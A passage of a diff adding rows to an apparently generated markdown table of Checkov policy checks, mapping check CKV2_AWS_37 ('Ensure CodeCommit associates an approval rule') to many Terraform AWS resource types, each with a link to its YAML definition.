+| 1056 | CKV2_AWS_37              | resource                         | aws_dms_replication_subnet_group                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1057 | CKV2_AWS_37              | resource                         | aws_dms_replication_task                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1058 | CKV2_AWS_37              | resource                         | aws_docdb_cluster                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1059 | CKV2_AWS_37              | resource                         | aws_docdb_cluster_instance                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1060 | CKV2_AWS_37              | resource                         | aws_docdb_cluster_parameter_group                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1061 | CKV2_AWS_37              | resource                         | aws_docdb_cluster_snapshot                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1062 | CKV2_AWS_37              | resource                         | aws_docdb_subnet_group                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1063 | CKV2_AWS_37              | resource                         | aws_dx_bgp_peer                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1064 | CKV2_AWS_37              | resource                         | aws_dx_connection                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1065 | CKV2_AWS_37              | resource                         | aws_dx_connection_association                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1066 | CKV2_AWS_37              | resource                         | aws_dx_gateway                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1067 | CKV2_AWS_37              | resource                         | aws_dx_gateway_association                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1068 | CKV2_AWS_37              | resource                         | aws_dx_gateway_association_proposal                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1069 | CKV2_AWS_37              | resource                         | aws_dx_hosted_private_virtual_interface                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1070 | CKV2_AWS_37              | resource                         | aws_dx_hosted_private_virtual_interface_accepter                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1071 | CKV2_AWS_37              | resource                         | aws_dx_hosted_public_virtual_interface                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1072 | CKV2_AWS_37              | resource                         | aws_dx_hosted_public_virtual_interface_accepter                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1073 | CKV2_AWS_37              | resource                         | aws_dx_hosted_transit_virtual_interface                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1074 | CKV2_AWS_37              | resource                         | aws_dx_hosted_transit_virtual_interface_accepter                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1075 | CKV2_AWS_37              | resource                         | aws_dx_lag                                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1076 | CKV2_AWS_37              | resource                         | aws_dx_private_virtual_interface                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1077 | CKV2_AWS_37              | resource                         | aws_dx_public_virtual_interface                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1078 | CKV2_AWS_37              | resource                         | aws_dx_transit_virtual_interface                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1079 | CKV2_AWS_37              | resource                         | aws_dynamodb_global_table                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1080 | CKV2_AWS_37              | resource                         | aws_dynamodb_table                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1081 | CKV2_AWS_37              | resource                         | aws_dynamodb_table_item                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1082 | CKV2_AWS_37              | resource                         | aws_ebs_default_kms_key                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1083 | CKV2_AWS_37              | resource                         | aws_ebs_encryption_by_default                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1084 | CKV2_AWS_37              | resource                         | aws_ebs_snapshot                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1085 | CKV2_AWS_37              | resource                         | aws_ebs_snapshot_copy                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1086 | CKV2_AWS_37              | resource                         | aws_ebs_volume                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1087 | CKV2_AWS_37              | resource                         | aws_ec2_availability_zone_group                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1088 | CKV2_AWS_37              | resource                         | aws_ec2_capacity_reservation                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1089 | CKV2_AWS_37              | resource                         | aws_ec2_client_vpn_authorization_rule                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1090 | CKV2_AWS_37              | resource                         | aws_ec2_client_vpn_endpoint                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1091 | CKV2_AWS_37              | resource                         | aws_ec2_client_vpn_network_association                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1092 | CKV2_AWS_37              | resource                         | aws_ec2_client_vpn_route                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1093 | CKV2_AWS_37              | resource                         | aws_ec2_fleet                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1094 | CKV2_AWS_37              | resource                         | aws_ec2_local_gateway_route                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1095 | CKV2_AWS_37              | resource                         | aws_ec2_local_gateway_route_table_vpc_association                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1096 | CKV2_AWS_37              | resource                         | aws_ec2_tag                                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1097 | CKV2_AWS_37              | resource                         | aws_ec2_traffic_mirror_filter                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1098 | CKV2_AWS_37              | resource                         | aws_ec2_traffic_mirror_filter_rule                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1099 | CKV2_AWS_37              | resource                         | aws_ec2_traffic_mirror_session                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1100 | CKV2_AWS_37              | resource                         | aws_ec2_traffic_mirror_target                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1101 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1102 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_peering_attachment                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1103 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_peering_attachment_accepter                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1104 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_route                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1105 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_route_table                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1106 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_route_table_association                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1107 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_route_table_propagation                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1108 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_vpc_attachment                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1109 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_vpc_attachment_accepter                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1110 | CKV2_AWS_37              | resource                         | aws_ecr_lifecycle_policy                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1111 | CKV2_AWS_37              | resource                         | aws_ecr_repository                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1112 | CKV2_AWS_37              | resource                         | aws_ecr_repository_policy                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1113 | CKV2_AWS_37              | resource                         | aws_ecs_capacity_provider                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1114 | CKV2_AWS_37              | resource                         | aws_ecs_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1115 | CKV2_AWS_37              | resource                         | aws_ecs_service                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1116 | CKV2_AWS_37              | resource                         | aws_ecs_task_definition                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1117 | CKV2_AWS_37              | resource                         | aws_efs_access_point                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1118 | CKV2_AWS_37              | resource                         | aws_efs_file_system                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1119 | CKV2_AWS_37              | resource                         | aws_efs_file_system_policy                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1120 | CKV2_AWS_37              | resource                         | aws_efs_mount_target                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1121 | CKV2_AWS_37              | resource                         | aws_egress_only_internet_gateway                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1122 | CKV2_AWS_37              | resource                         | aws_eip                                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1123 | CKV2_AWS_37              | resource                         | aws_eip_association                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1124 | CKV2_AWS_37              | resource                         | aws_eks_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1125 | CKV2_AWS_37              | resource                         | aws_eks_fargate_profile                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1126 | CKV2_AWS_37              | resource                         | aws_eks_node_group                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1127 | CKV2_AWS_37              | resource                         | aws_elastic_beanstalk_application                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1128 | CKV2_AWS_37              | resource                         | aws_elastic_beanstalk_application_version                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1129 | CKV2_AWS_37              | resource                         | aws_elastic_beanstalk_configuration_template                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1130 | CKV2_AWS_37              | resource                         | aws_elastic_beanstalk_environment                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1131 | CKV2_AWS_37              | resource                         | aws_elasticache_cluster                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1132 | CKV2_AWS_37              | resource                         | aws_elasticache_parameter_group                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1133 | CKV2_AWS_37              | resource                         | aws_elasticache_replication_group                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1134 | CKV2_AWS_37              | resource                         | aws_elasticache_security_group                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1135 | CKV2_AWS_37              | resource                         | aws_elasticache_subnet_group                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1136 | CKV2_AWS_37              | resource                         | aws_elasticsearch_domain                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1137 | CKV2_AWS_37              | resource                         | aws_elasticsearch_domain_policy                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1138 | CKV2_AWS_37              | resource                         | aws_elastictranscoder_pipeline                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1139 | CKV2_AWS_37              | resource                         | aws_elastictranscoder_preset                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1140 | CKV2_AWS_37              | resource                         | aws_elb                                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1141 | CKV2_AWS_37              | resource                         | aws_elb_attachment                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1142 | CKV2_AWS_37              | resource                         | aws_emr_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1143 | CKV2_AWS_37              | resource                         | aws_emr_instance_group                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1144 | CKV2_AWS_37              | resource                         | aws_emr_security_configuration                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
